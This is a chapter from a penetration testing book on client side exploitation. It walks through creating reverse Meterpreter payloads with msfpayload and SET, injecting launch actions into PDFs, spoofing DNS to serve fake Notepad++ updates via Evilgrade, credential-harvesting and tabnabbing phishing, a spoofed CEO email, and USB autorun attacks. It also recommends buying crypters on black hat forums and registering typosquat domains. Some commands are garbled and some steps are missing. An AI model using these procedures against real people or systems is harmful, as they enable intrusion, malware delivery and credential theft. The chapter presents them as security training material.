The server side is getting stronger by the day, but the client is still left vulnerable, like the saying goes “There is no patch to human stupidity.” This chapter will introduce the readers to various client side exploitation techniques that can be used in a penetration test. Client side exploits are useful in the cases where the victim is behind a router, Nat or firewall, or anything not directly reachable to us.
The success of client side exploitation is directly proportional to the amount of time you spend performing reconnaissance. This means that you need to gather personal information about the target victim such as likes, dislikes, favorite pet names, etc. Social media are the best source for this kind of information.
So let’s talk about some of the client side exploitation methods that we can utilize in real-world penetration tests.
In this particular attack scenario, we will send the victim malicious files such as PDF, exe, or mp3 in the hope that the victim would click on the link and download and execute the attachment. Upon execution, we will have a meterpreter session opened on the victim’s machine.
In this particular attack scenario, we will send malicious links in the hope that our victim would click on it. The link could be a fake log-in page or a webserver hosted with our malicious code. Considering we are hosting a webserver, the code will be executed in the victim’s browser and we will have a meterpreter session opened.
In this scenario, we will utilize our previously learned skills to compromise the client side updating process. It means that whenever our victim updates a particular software, he will download our malicious code instead. We will discuss this in detail later.
This method can be used if you have physical access to the victim’s machine: We could load up a malicious PDF file or a malicious executable code via a USB stick. Once the USB stick is inserted, our malicious code will automatically be executed and we would get a meterpreter session opened on the victim’s machine.
Next, we will discuss each of these methods in detail. We will use “Social Engineering Toolkit”—a neat software written by David Kennedy for performing social engineering attacks. The SET can be used to perform most of the attacks we have talked about earlier. First let’s discuss the methods we can use for the first scenario.
In this section, we will discuss creating a custom executable and sending it to the victim and will also talk about some of the PDF attacks. So let’s start by creating a custom executable with SET.
This attack can be a bit difficult to accomplish, as you need to convince the victim to execute your .exe file. Another major hurdle would be the victim’s antivirus, which you need to bypass. Luckily, Metasploit has some built-in encoding mechanisms that, when used effectively, can evade some antiviruses, and if used effectively. However, all this is based on trial and error. Alternatively, you can buy a paid crypter, which you can find on black hat forums such as hack-forums.net; the crypters are pretty cheap and can help you make your executable FUD, that is, fully undetectable.
If you want to go with the first option, you need to make sure that your executable is able to bypass the antivirus the victim is using.
SET, in my opinion, is one of the best tools to perform client side attacks. It harnesses the power of Metasploit to carry out a wide variety of client side attacks. In this chapter, we will use the SET to perform multiple client side attacks. So let us start by creating a backdoor from SET.
/pentest/exploits/set
directory in BackTrack and run the following command from the /set
directory:
root@bt:~# cd/pentest/exploits/set
root@bt:~#./set
Step 2—Press “1” and it will display all the social engineering attack vectors and then press the fourth option that states “Create a payload and a listener.”
Note: It is always good practice to update the SET before using it, which you can do by pressing “5” on your keyboard.
our/pentest/exploits/set
named msf.exe. Now you need to convince the victim to execute it inside his system; once he executes it, you will have a session opened.
You can now interact with the shell, by using the following command:
sessions –i 1
Using an executable may not be the best method, so we will talk about an approach that is more useful in real-world scenarios.
PDF hacking is one of the topics on ethical hacking and penetration testing that is close to my heart. I was totally unaware of the power of PDFs for a long time. Once I learned about them and familiarized with them, PDF hacking became one of my favorite subjects in ethical hacking.
Lots of penetration testers are unaware of the power of PDFs and their effectiveness in penetration tests. PDF hacking and PDF reconnaissance are most of the times ignored by penetration testers, even those at an advanced level.
Before we actually get into creating a malicious PDF document, we will learn about the basics, which include the structure of a PDF document, using it for performing reconnaissance. So let’s begin.
The language of PDF is very descriptive, which gives us a wide variety of attack surface, so before jumping into the reconnaissance, first, let’s look at the basic structure of a PDF file.
In-case if you open up a PDF document inside wordpad or a notepad editor, you would see the following sections:
The header, indicated in green, specifies the version of the PDF document, %PDF-1.1 in this case. The versions may vary from 1.0 to 1.7.
The body is the part of a PDF document where all the objects, names, etc., are located.
The cross reference table is indicated in purple. It has a highly defined structure and specifies where an object is located in a PDF document.
The trailer will always begin from %%EOF as PDFs are always rendered from bottom up, so whenever you open up, it will start reading it from %%EOF and then it will jump and start to locate the line “Start Xref”, which is always followed by a number.
These definitions might look a bit complicated, but once you get into some advanced PDF attacks, you will get a hang of them.
PDF launch action is one of the most useful features of a PDF document. With PDF launch action, you can actually launch other things along with PDF. PDF launch action was widely abused in the older version of Adobe Reader in which PDF launch action was used to spread malware and botnets such as Zeus.
This discovery was first made by M86 Security researchers. According to them, users would receive an e-mail with the subject “Royal mail delivery invoice.”
The document contained an attached PDF that when downloaded by the users installed a Zeus bot on the victim’s computer.
The following dialog box appeared when the PDF document was opened. On pressing “Ok”, Zeus bot would be installed and executed in the PDF document.
Let’s see how we can use the launch action in the PDF document. Experimenting with PDF launch action will be more convenient if you have an empty PDF file or one with minimum text. Once you have created a blank PDF, open it in Notepad or WordPad. It will look something similar to the following:
Note: Before you perform the exercise, make sure you download Adobe Reader 9.3.2 as the launch action is not patched. You can get it from oldapps.com
Next scroll down the file to find the name object section, the section would look as follows:
Next add the following line replacing <Length 500.
/Type/Action
/S/Launch
/Win
«
/F (calc.exe)
Here is how it will look:
Next save it as a .pdf document and open it in your Adobe Reader. You will see the following warning box:
Now, let’s see what this syntax means:
From what we have done so far, it’s quite clear what we are executing on the victim’s machine, which will make the victim suspicious and will prevent him from launching it.
So in order to get things going, we need to control the dialog box. There are several methods to do that, but we will use the most effective one. You just need to add the following lines after /F (cmd.exe):
The /P
command is used to pass an additional parameter along with /F. Now after adding this line, you can save your PDF and launch it again. You will see that the calc.exe executing command has moved upward.
You might still be wondering of what use is a PDF launch action, but you will soon find out how dangerous PDF attacks can be when we come to the exploitation part.
PDF documents can also be used in gathering information about the target. As you already know, the more information you gather, the more successful a penetration test will be. PDF documents often contain some very useful metadata, which can be used to perform a wide variety of social engineering attacks. So let’s begin.
There are a couple of tools you can use to collect metadata from PDF, namely, metagoofil and PDFINFO. I would recommend PDFINFO as metagoofil is quite buggy.
PDFINFO is a command line Unix-based tool used to gather information about a particular PDF document. The information includes the operating system, PDF reader version, etc. Now, let’s begin experimenting with PDFINFO.
We will use the blank.pdf we created in the launch action exercise. So let’s say that we want to gather information about blank.pdf. All we need to do is to issue the following command in the console.
Now let’s have a look at what useful information we could gather. In the first line, you can see the author’s name, “Abdul Rafay Baloch,” which might be very useful to us. Next, we see the most important line “Microsoft Word 2010”. This might not be of interest to a layperson, but a hacker is always interested in figuring out how this information can be put to use.
By identifying what PDF software a user has used to generate PDF files, a hacker might be able to find potential vulnerabilities in that software, or look for some already-discovered vulnerabilities for that particular version, and can use those vulnerabilities against the target.
Suppose you are pentesting against an organization. Knowing what software the organization uses for generating PDF files could be helpful to you in carrying out social engineering and other attacks.
PDFTK is another useful tool for generating PDF files, which has multiple functionalities like combining and compressing PDF files. It’s not very efficient though when compared to Origami Framework, which could be used to generate PDF files more conveniently.
If you would like to know more about this tool, visit http://www.pdflabs.com/docs/pdftk-cli-examples/
Origami framework is used for creating and manipulating PDF frameworks. It is one of my favorite tools for creating and experimenting with PDF documents. It makes creating PDF much simpler than any other tool out there.
By default, Origami framework is not available on BackTrack, so we need to install in order to experiment with it. Here is how you can install Origami framework on your BackTrack.
wget http://seclabs.org/origami/files/origami-last.tar.gz
tar xzvf origami-last.tar.gz
origami-1.0.0-beta1
”I would strongly recommend you to get familiarized with this tool if you like to dig deeper into this subject.
It’s finally time to attack with PDF. In this section, we will talk about some of the commonly used PDF exploits with Metasploit, then we will do it the easy way with the social engineering toolkit.
So without wasting any more time, let’s fire up Metasploit. Once in Metasploit console, type in the following command:
Search pdf
This will display all the exploits present in Metasploit with the pattern PDF. Most of the PDF exploits in Metasploit work by embedding an exe in the PDF file, making it harder for antivirus software or the victim to recognize the malicious file.
The exploits may range from buffer overflows to misuse of the configurations, such as PDF launch action discussed earlier. As you can see from the following screenshot that PDF exploits are generally been broken down into two categories:
Fileformat exploits are one of the most efficient and most common PDF exploits used by penetration testers. Fileformat exploits enable you to create a malicious PDF file, which once executed by the victim will give the shell to the attacker. Using exploits present in Metasploit, once you infect a single file on the victim’s computer, it’s possible for you to infect all other PDF files on that computer.
Browser exploits are not used much by pentesters. However, they can prove beneficial in some situations. Here is how PDF browser exploit works:
The purpose of the book is not only to teach you to work with the tools but to familiarize you with a proper penetration testing methodology. Tools keep changing, but the methodology remains the same.
So imagine a real-world scenario where you are pentesting against a company ABC. By using some information-gathering techniques you learned in the previous chapter, you find out that the e-mail address of the CEO is steven@abc.com.
By using a fake mailer, you e-mail the following message to Steven from the e-mail address of the company’s IT department head, say, Rolph.
We would like to inform you about a critical update for all Windows users. We recommend you read the attached PDF document and follow the step-by-step instructions mentioned in the document to update your system.
Warm regards,
Rolph | ABC.com
ABC IT DEPT
The CEO will think that the e-mail is legitimate and is really from the IT department, so he will open the PDF document without hesitation, thereby enabling the attacker to take full control of his computer.
This is one of the most popular PDF exploits in Metasploit. This exploit embeds an executable in a PDF document and takes advantage of the PDF launch action vulnerability found inside the previous versions of Adobe Reader to exploit it.
The best exploit for the ABC company scenario will be a fileformat exploit, and what could be better than to use an Adobe PDF Embedded EXE for this task. So let’s go ahead and create a malicious PDF template with Metasploit.
Step 3—Next, type “show options”. It will display the requirements you need to in order to create a template. You can use a predefined template, e.g., evil.pdf, or define a PDF that you want the exe to be embedded in.
We can also see that the “INFILENAME” is required, so we need a blank PDF file in which it will embed the exe. You can use any PDF file you want.
You can also edit the launch action message depending upon the scenario. You can do this by typing the following command:
set LAUNCH_Message <message>
set payload windows/meterpreter/reverse_tcp
The payload will be followed by the LHOST and LPORT
/root/.msf4/local/
directory.
Finally, we will send it to the victim and trick him into executing it. Once it is executed, you will have injected a Meterpreter shell on his computer.
The Social Engineering toolkit makes PDF exploitation very easy. With this toolkit, you can generate a malicious PDF within seconds. It is just a matter of pressing 1’s and 2’s on the keyboard, and you get your malicious PDF file generated. Here is how you can generate a malicious PDF file with Metasploit.
Step 2—Once you are inside the “Infectious Media Generator” menu, you will have to choose between two options:
As we are working with fileformat exploits here, we will choose the first option by pressing “1” on the keyboard.
Once the victim runs the PDF file, you will receive a reverse connection to your BackTrack box.
So now you can see how easy it is to create malicious PDF files with SET.
That concludes our discussion on hacking with PDF. Many pentesters ignore PDF exploits thinking they are useless. These hackers really don’t know what PDF exploits are capable of. According to me, PDF exploitation is one of the best client side exploitation techniques.
PDF exploitation is an extensive topic and every aspect cannot be covered in this book. However, the following links will help further your understanding of PDF vulnerabilities and exploitation techniques.
http://blog.didierstevens.com/
http://www.sudosecure.net/
In this scenario, we will send the victim a malicious link, and when the victim clicks on it, we will be able to perform various attacks. Here are some examples:
All of this can be easily done by using various modules in Social engineering toolkit. For the last scenario, we will learn to attack over the Internet (WAN) instead of LAN. But for now, let’s talk about another scenario where we will use the SET to set up a fake log-in page.
Credential harvester is a very popular attack; it can be used to perform a phishing attack. In a phishing attack, an attacker sets up a replica of a website, say, gmail.com, whenever the victim logs in to it, the credentials will be saved. This can be done with the “Credential Harvester Attack” in SET. Let’s see how to do it.
As you can see from the screenshot, the credential harvester is up and running on the IP we entered. We can perform a DNS spoofing attack by replacing gmail.com’s IP with our’s where the credential harvester is running. We already learned about DNS spoofing in the “Network Sniffing” chapter (Chapter 6).
As soon as the victim navigates our IP address, where we have set up our credential harvester, his credentials would be recorded and displayed to us.
Tabnabbing is another form of phishing attack, where the attacker takes advantage of the fact that the victim doesn’t normally think that tabs will change when he is not around. This type of attack would rewrite the existing tab with the attacker’s website. Whenever the victim comes back to that tab, he will think that he has logged out of a particular website and would try to log in again, and as soon as the victim logs in to his account, the attacker will capture the credentials. The SET can be used to launch this attack. Let’s see how it’s done.
As soon as he switches the tab, the website will be redirected to the fake gmail log-in page.
As soon as our victim enters the credentials, his credentials will be saved.
We have other advanced attack vectors in the SET related to phishing. One of them is “Man Left in the Middle,” where the attacker requires an XSS vulnerability to trigger an attack. Since we haven’t learned about XSS vulnerability yet, we won’t discuss it now. We will learn all about it in the “Web Hacking” chapter (Chapter 12). Another great attack vector is the “Web Jacking” attack vector, where the victim would be presented a link stating “Website has been moved.” When the victim hovers his mouse over the link, it would point to the real URL, not the attacker’s URL. Here is what the victim would be presented with:
Whenever the victim clicks on it, gmail.com will open; however, it will be replaced with our malicious webserver after a few seconds.
Tip: A better attack strategy is to register a domain similar to the real domain; for example, in the case of facebook.com, you can register faceboook.com and host your attack there.
Browser-based exploits are one of the most important forms of client side exploits. Imagine a scenario where you are pentesting against an organization. If it’s an internal pentest, you would already own a box on the LAN. If it’s an external pentest you need to somehow gain access to a system. You can set up a malicious webserver and ask the victim to visit the server. As soon as he clicks your link, he gets compromised.
Most of the employees of an organization frequently browse on social networking websites like Facebook and Orkut. We, as penetration testers, can take advantage of this and send malicious links to the employees and compromise them.
On an internal network, the attacker could simply use a DNS poisoning attack to redirect victims to his malicious webserver. To sum up, there is a whole lot of attack surface when it comes to browser exploitation.
We will now discuss how to use the SET and other methods to attack over the Internet. In this particular demonstration, I will walk you through the process of attacking over the Internet when you are behind a NAT.
So the attack scenario is pretty simple. Our malicious SET server hosting browser exploits would run on the public IP address 73.67.123.85. Whenever the victim having a local IP 192.168.1.2 and public IP 88.45.56.14 would try to connect at the SET server, it will redirect all the traffic coming to the attacker’s local IP address, 192.168.3.2, on a specific local port.
Note: To be able to perform this attack, the attacker should control the router’s incoming and outgoing communications.
Tip: For the malicious SET webserver, you should always use port 80 or port 443 because most of the times they are enabled by the firewall; if you specify a port that the firewall does not allow, the firewall will drop all the traffic coming to that port.
Now you know the attack scenario; let’s prepare our machines for the attack.
Configuring the SET to Ask for Public IP
The set_config file has an option called AUTO_DETECT. When the option is set to “ON,” the SET does not ask for the public IP; it will automatically use our private IP for the reverse handler. As we want to use the SET to attack over the Internet, we would need to set the AUTO_DETECT to “OFF” as we want the SET to ask for our public IP. The set_config file is located in the /pentest/exploits/set/config
directory. You can use any text editor to edit it.
Making Your IP Address Static
The second step would be to set your IP static. On Windows, you can do it by accessing the properties of your network adapter and then clicking on the appropriate “Internet Protocol Version 4 (TCP/IPV4) Properties.” Here is an example:
Since our attacker machine is a “BackTrack 5” machine, we would be only interested in making its IP static. We can do it by accessing the WICD manager. We can access it by going to Application → Internet → WICD Network Manager.
Under WICD Network Manager, select the appropriate network interface and click on its properties and fill in the appropriate details (see the following screenshot).
Opening Ports on the Router
Next, you need to open up two ports on your router: first, the one which the SET external webserver would be listening on (by default the SET webserver listens on port 80, but you can change it in the set_config file if you would like to), second, the one on which you would receive connections. The method for opening ports might differ based on what type of router you have. You can also use netcat to open up ports.
nc –lvp 80//For SET webserver
nc –lvp 4444 | For Reverse Handler
Make sure that you have disabled your antivirus and firewall, when opening the ports.
We can verify the open ports by using a free website called canyouseeme.org. We will check if your ports are opened.
Note: You really don’t need to open port 80, as the SET will automatically open it up for you.
Now your Windows box has a public IP 75.15.84.55 running on port 80 whereas your BackTrack box has the IP 192.168.1.4 hosting the server on local port 4444. You need to redirect the traffic from your Windows box to your BackTrack box. You can use a neat tool called SPI port forward for this task. Here’s how it’s done:
So whenever my Windows machine would receive a connection on port 80, it will forward it to the BackTrack machine running on 192.168.1.4 listening to port 4444.
Now that everything is configured, we can launch the “Browser AUTOPWN” attack via SET. In this particular scenario, we will use the SET to create a malicious webserver hosting our exploits. First, let’s have a brief look at “Browser Autopwn,” which will fire up all the available exploits present in Metasploit.
With so many different types of browsers, how can we possibly know what browser the victim uses. To find out, we perform the Browser AutoPWN attack, which loads the webserver with all the malicious browser-based exploits, including the ones for Opera, Firefox, Internet Explorer, Google Chrome, etc. So if the victim is on any one of these browsers, the malicious code will run into the victim’s browser, hence compromising his system.
At this point of time, you might be wondering why use an individual exploit when we can use Browser AutoPWN that can make our work a lot easier. The answer is we don’t want to be blocked by intrusion detection systems and other network defense strategies. Browser AutoPWNs are very loud at the other end and can be easily detected as we are just firing the exploits on the browsers. So this strategy is not advisable and many pentesters avoid using it.
4. Setting Up Malicious WebServer On SET
Now, we can finally set up our malicious webserver via the SET as follows:
Step 2—Next, it will ask you for the type of webtemplate you would like to use; we will go with the first option. It will now ask if NAT forwarding or port forwarding is enabled; since we are using it, we will type “yes”.
After that it will ask for your external IP address; you would need to enter your public IP. You can check your public IP by going to getip.com, apart from getip.com there are tons of other sites that can show your IP.
Within a few minutes, the SET will launch the webserver. The victim would not be able to access it on the public IP address of the attacker on port 80.
Another method you can use would be a VPS server or a dedicated server installed with BackTrack, which is better, faster, and safer. On a dedicated server, you would have more freedom to install whatever you want. But, as it’s expensive than a VPS server, I recommend you buy a VPS server with BackTrack installed and use its public IP to launch different types of attacks.
In this scenario, we will compromise client side updates by using a neat tool called Evilgrade, which comes preinstalled with BackTrack. Evilgrade takes advantage of insecure update processes as the user normally does not double-check before an update because they trust that the application is being downloaded from the right place.
The other point worth noting is that the application being updated performs integrity checks by comparing the MD5/SHA-1 hashes, which means that the application will only check if the correct update file is being downloaded but not the authenticity of its origin. The bottom line is that the integrity is checked, but the authenticity of the update is not checked.
Evilgrade is an open-source modular framework developed in Perl. It is capable of injecting its own fake updates. Evilgrade comes with built-in modules of different applications such as Notepad, iTunes, Safari, Windows Upgrade, and many other applications.
In order for Evilgrade to work, you need to be able to manipulate the victim’s DNS traffic, which can be achieved in many ways. We will talk about this later.
Let’s talk about some of the possible attack vectors for Evilgrade, for both internal and external networks. Basically, any attack that can be used to manipulate the victim’s DNS traffic could be performed via evilgrade.
Here are some of the attack vectors to use when you are on the same network as the target is:
The Evilgrade console is pretty much the same as Cisco’s IOS console, with the same commands. Let’s take a look at some of the basic commands.
In this scenario, we will be attacking a user on an internal network who frequently uses Notepad++ to do his daily work.
The first step would be to create a Windows binary to obtain a reverse Meterpreter shell. This is the code that would be executed on the victim’s machine whenever he updates Notepad++. We can use the msfpayload to generate a reverse Meterpreter payload.
root@bt:~# msfpayload windows/Meterpreter/reverse_tcp
lhost=192.168.75.144 lport=4444 X > xen.exe
This command will create a Windows binary that will connect back to us on port 4444 giving us a Meterpreter session.
Evilgrade is installed in the /pentest/exploits/isr-evilgrade
directory in BackTrack 5. Navigate to the directory and launch it.
root@bt:~#cd/pentest/exploits/isr-evilgrade
root@bt:/pentest/exploits/isr-evilgrade#./evilgrade
Next, we would set up the DNSAnswerIP to our local IP address. This IP will do the DNS answers for us.
evilgrade> set DNSAnswerIp 192.168.75.144
We now need to configure the module that we want to use, the “Show Modules” command lists all the modules that are present in evilgrade.
As it is Notepad++ in our case, we will use the following command to configure the module:
evilgrade> configure notepadplus
Next, we will enter the “show options” module to list all the options that can be used with this module.
As you can see, we have only two options. The important one is the agent; this will be the path to our payload. In my case, I have saved it under /root/xen.exe. I will set it up by using the following command:
evilgrade(notepadplus)>set agent/root/xen.exe
Once you are done with it, enter “start” to start the DNS/Webserver.
Next, we will set up a listener on Metasploit where we would receive the connections. We enter the following command to do it:
msf> use exploit/multi/handler
msf> set payload windows/Meterpreter/reverse_tcp
msf> set LHOST 192.168.75.144
msf> set LPORT 4444
These commands would set up a listener on port 4444. When our agent is executed on the victim’s machine, it would send a reverse connection to our local IP address on port 4444.
We have discussed how to launch DNS spoofing attacks in detail; therefore, I will walk you through the process briefly here. In order to perform a DNS spoofing attack, we need to change the place where Notepad installs updates to our local host. To do that, we have to edit the etter. dns file. You can do it by using the following command:
root@bt: pico/usr/local/share/ettercap/etter.dns
We now need to create a new “A” record, for notepad-plus.sourceforge.net, from where the Notepad++ would receive updates to our local IP.
Note: We came to know that Notepad++ receives updates from notepad-plus.sourceforge.net by entering the “show options” command in the module.
Next, launch the DNS spoofing attack with Ettercap or any other tool. If you are unsure of how to do it, refer to the “Network Sniffing” chapter (Chapter 6).
Step 7—So now we are ready to attack. As soon as the victim opens his Notepad++, he will be asked to update the application. As soon as the victim clicks “Yes,” our payload will be executed and we will enter a Meterpreter session.
As discussed earlier, this type of attack is useful only when you have physical access to the victim’s computer, whereby we can load up our malicious payload upon inserting the USB stick to the computer, which will give us a reverse connection. Note that this attack would work only if auto-run is enabled on the victim’s computer. So let’s begin.
We are now done with creating our executable. All you need to do is to burn it to a USB and load it on the victim’s machine. Once done, it will automatically execute if autorun.inf is enabled, and you will get a reverse connection.
Teensy USB is a device that has the capability to emulate mouse and keyboard. It can help you bypass the autorun.inf protection, which means that you will be able to execute a code on the victim’s computer even if autorun.inf is disabled. With social engineering toolkit we can set up a WSCRIPT file which will download our payload and execute it as the device would emulate itself as a keyboard you can easily bypass the autorun.inf protections since your computer would recognize it as a Keyboard not a CD/USB or DVD. Teensy USB costs about $20, and it’s worth every penny.
In client side exploitation, we take advantage of the weakest link, that is, clients. Our major targets are client side software like web browsers, media players, and e-mail applications. The vulnerabilities in these software are published often, and clients usually do not update necessary patches frequently.
Another advantage we discussed is that it can help us exploit systems that are not directly accessible from the outside due to NAT, firewall, etc. We discussed various methods to launch client side exploits. We even talked about some advance attack vectors such as those used to compromise client side updates.
The SET’s official documentation has a great resource explaining how this attack could be launched. You can check it out at
http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)#Infectious_Media_Generator.
Find answers on the fly, or master something new. Subscribe today. See pricing options.